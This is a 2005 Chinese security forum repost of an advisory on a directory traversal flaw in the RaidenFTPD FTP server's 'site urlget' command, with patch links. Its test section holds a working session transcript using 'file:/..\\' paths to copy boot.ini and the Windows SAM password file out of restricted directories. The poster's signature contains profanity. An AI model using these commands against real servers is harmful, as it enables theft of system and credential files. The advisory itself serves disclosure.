[转载]RaidenFTPD 2.4 Build 2241以下版本目录限制绕过漏洞

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9869
精华: 771
积分: 40986
阅读权限: 200
性别: 男
在线时间: 3986 小时
注册时间: 2004-7-4
最后登录: 2008-12-3

发短消息
加为好友
当前离线

楼主大中小发表于 2005-5-3 15:13 只看该作者

[转载]RaidenFTPD 2.4 Build 2241以下版本目录限制绕过漏洞

信息来源：A^C^E

产品描述：
RaidenFTPD is an easy-to-use ftp server software for
Windows?. With this handy tool you can share your
files with friends, provide file download services to
customers or even setup your own private network file
server. Not only are all the basic FTP server features
built-in; it also features various advanced features
such as SSL/TLS, UTF8, UPnP NAT traversal and more ..
问题描述：
Directory Traversal - Failure to validate input for
the site command 'urlget'.

Using urlget it's possible for a normal user to escape
ftproot and download known files from restricted
directories.

The JohnLong Team acted promptly to resolve the issue.
补丁下载
http://www.raidenftpd.com/en/
FULL :
http://www.raidenmaild.com/download/raidenftpd2.exe
UPDATE :
http://www.raidenmaild.com/download/update.exe
测试方法

引用:

230 User ****** logged in.
ftp> quote site urlget file://\..\\boot.ini
550 site urlget failed : hacking attempt , you have
been logged.
ftp> quote site urlget file:/..\\boot.ini
220 site urlget : downloading
file:/..\\boot.ini->boot.ini
ftp> ls
200 Port command ok.
150 Opening ASCII data connection for ls /.
boot.ini
226-free disk space under this directory : 28919 mb
226 Transfer finished successfully.
Data connection closed .
ftp: 10 bytes received in 0.00 Seconds
10000.00Kbytes/sec.
ftp> quote site urlget file:/..\\winnt/repair/sam
220 site urlget : downloading
file:/..\\winnt/repair/sam->sam
ftp> ls
200 Port command ok.
150 Opening ASCII data connection for ls /.
boot.ini
sam
226-free disk space under this directory : 28919mb
226 Transfer finished successfully.
Data connection closed .
ftp: 15 bytes received in 0.00Seconds
15000.00Kbytes/sec.
ftp>

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››